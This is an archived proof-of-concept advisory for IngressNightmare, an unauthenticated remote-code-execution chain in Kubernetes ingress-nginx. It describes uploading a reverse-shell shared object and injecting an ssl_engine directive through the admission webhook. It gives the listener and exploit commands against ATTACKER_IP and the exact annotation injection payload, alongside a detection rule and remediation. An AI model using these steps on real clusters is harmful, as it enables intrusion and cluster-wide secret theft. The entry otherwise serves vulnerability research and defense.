IngressNightmare - Kubernetes Ingress-NGINX Unauthenticated RCE
by Hakai Security (hakaioffsec) / QuimeraX Intelligence; original vulnerability discovery by Wiz Research · 2026-05-17
- Severity
- Critical
- CVE
- CVE-2025-1974 (primary); also CVE-2025-1097, CVE-2025-1098, CVE-2025-24514
- Category
- cloud
- Affected product
- Kubernetes Ingress-NGINX Controller (ingress-nginx)
- Affected versions
- Ingress-NGINX Controller prior to 1.12.1 and prior to 1.11.5
- Disclosed
- 2026-05-17
- Patch status
- unpatched
Tags
References
- https://nvd.nist.gov/vuln/detail/CVE-2025-1974
- https://nvd.nist.gov/vuln/detail/CVE-2025-1097
- https://nvd.nist.gov/vuln/detail/CVE-2025-1098
- https://nvd.nist.gov/vuln/detail/CVE-2025-24514
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://hakaisecurity.io/
- https://github.com/hakaioffsec/IngressNightmare-PoC
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-03-26 |
| Author / Researcher | Hakai Security (hakaioffsec) / QuimeraX Intelligence; original vulnerability discovery by Wiz Research |
| CVE / Advisory | CVE-2025-1974 (primary); also CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 |
| Category | cloud |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3) |
| Status | Weaponized |
| Tags | RCE, Kubernetes, ingress-nginx, admission-controller, unauthenticated, nginx-config-injection, cluster-takeover, k8s, shared-object, reverse-shell |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Kubernetes Ingress-NGINX Controller (ingress-nginx) |
| Versions Affected | Ingress-NGINX Controller prior to 1.12.1 and prior to 1.11.5 |
| Language / Platform | Python 3.x (exploit), C (shared object payload); Kubernetes cluster environment |
| Authentication Required | No (unauthenticated, reachable from within pod network) |
| Network Access Required | Yes (access to ingress controller pod network or admission webhook endpoint) |
Summary
IngressNightmare is a chain of critical vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) in the Kubernetes Ingress-NGINX admission controller. Discovered by Wiz Research, the vulnerabilities allow an unauthenticated attacker reachable from within the Kubernetes pod network to achieve Remote Code Execution on the ingress-nginx controller pod and subsequently read all secrets across all namespaces, enabling full cluster takeover. This PoC was developed by Hakai Security / QuimeraX Intelligence after Wiz did not release a functional exploit. It exploits unsafe nginx configuration injection via the admission webhook, uploading a malicious shared object as the ssl_engine directive to obtain a reverse shell.
Vulnerability Details
Root Cause
The Ingress-NGINX admission webhook processes Ingress resource annotations without sufficient sanitization of user-supplied values. Specifically, annotations such as nginx.ingress.kubernetes.io/auth-tls-match-cn are injected directly into the generated nginx.conf file without proper escaping or validation (CWE-74: Improper Neutralization of Special Elements in Output). This allows an attacker to inject arbitrary nginx configuration directives, including ssl_engine, which instructs nginx to load a custom shared object from a path resolvable within the pod’s filesystem. Since the admission webhook is accessible from within the pod network without authentication, any pod in the cluster can trigger the exploit.
Attack Vector
- The attacker compiles a malicious C shared object (
evil_engine.so) containing a constructor that executes a reverse shell command. - The shared object is uploaded to the ingress-nginx controller pod via a crafted HTTP POST with a mismatched
Content-Lengthheader, keeping the connection and file descriptor open so the file persists at a predictable/proc/{pid}/fd/{fd}path. - The attacker sends a crafted AdmissionReview request to the admission webhook endpoint, injecting an
ssl_enginedirective pointing to the file descriptor path (/proc/{pid}/fd/{fd}). - The admission controller processes the forged nginx config, nginx loads the
ssl_engineshared object, and the constructor payload executes the reverse shell. - File descriptor is brute-forced by iterating over process IDs (1-50) and file descriptor numbers (3-30).
Impact
Remote Code Execution as the ingress-nginx controller process within the Kubernetes cluster. The controller pod has a service account token with privileges to read all Kubernetes secrets across all namespaces. This enables extraction of credentials, certificates, and API keys for all applications in the cluster, and full cluster takeover by impersonating privileged service accounts.
Environment / Lab Setup
OS: Linux (attacker and Kubernetes nodes)
Target: Kubernetes cluster with Ingress-NGINX Controller < 1.12.1 / < 1.11.5
Attacker: Pod within the cluster or host with access to the pod network
Tools: Python 3.x, GCC compiler, pip (requests module), netcat (reverse shell listener)
Network: Access to ingress controller pod IP (public ingress URL) and admission webhook URL (internal)
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Set up reverse shell listener on your attacker host.
1nc -lvnp 443Run the exploit providing the public ingress URL, internal admission webhook URL, and attacker host:port.
1python3 exploit.py http://<INGRESS_URL> https://rke2-ingress-nginx-controller-admission.kube-system <ATTACKER_IP>:443Note: if the admission webhook is in a different namespace, append the namespace as a 4th argument.
Exploit workflow executed automatically:
exploit.pycompilesevil_engine.sofromlib_template.cwith attacker IP/port substituted.- Sends the
.soto the ingress pod via HTTP with mismatched Content-Length to keep the fd open. - Brute-forces
/proc/{pid}/fd/{fd}against the admission webhook via threadedAdmissionReviewrequests. - Nginx loads the
ssl_enginepointing to the fd path, the constructor fires the reverse shell.
Receive reverse shell in the netcat listener.
Exploit Code
See
exploit.pyandlib_template.cin this folder.
| |
| |
Expected Output
[+] Shared object compiled successfully
[*] Sending evil_engine.so to ingress pod...
Trying Proc: 1, FD: 3
Trying Proc: 1, FD: 4
...
Response for /proc/7/fd/15: 200
[reverse shell received on attacker netcat listener]
Screenshots / Evidence
- No screenshots provided in source repository. A demo video is available in the repo:
assets/9e893abf-5c01-4fcb-ad79-7115b429281f.
Detection & Indicators of Compromise
"nginx.ingress.kubernetes.io/auth-tls-match-cn": "CN=abc #(\\n){}\\n }}\\nssl_engine ../../../../../../proc/{pid}/fd/{fd};"
SIEM / IDS Rule (example):
alert http any any -> $K8S_ADMISSION_WEBHOOK any (msg:"CVE-2025-1974 IngressNightmare ssl_engine Injection"; content:"ssl_engine"; content:"/proc/"; within:50; http_client_body; sid:9002027; rev:1;)
Remediation
| Action | Detail |
|---|---|
| Patch | Upgrade Ingress-NGINX Controller to 1.12.1 or 1.11.5 immediately |
| Workaround | Restrict admission webhook access to only the Kubernetes API Server using NetworkPolicy; temporarily disable the admission controller component if patching is not immediately possible |
| Config Hardening | Apply network policies preventing direct pod-to-webhook communication; audit all Ingress annotations for unexpected nginx directives; enable Kubernetes audit logging for AdmissionReview requests |
References
- CVE-2025-1974
- CVE-2025-1097
- CVE-2025-1098
- CVE-2025-24514
- Wiz Research - IngressNightmare Blog Post
- Hakai Security
- Source Repository
Notes
The Wiz Research team discovered the vulnerability chain but did not publish a functional exploit; Hakai Security / QuimeraX built and released this independent PoC. The file descriptor persistence trick (sending a larger Content-Length than actual body to keep the connection and fd alive) is the key enabler for the attack. Review the review.json file’s annotation field to understand the exact injection format. The brute-force range for proc/fd can be extended but may generate significant noise. Auto-ingested from https://github.com/hakaioffsec/IngressNightmare-PoC on 2026-05-17.
| |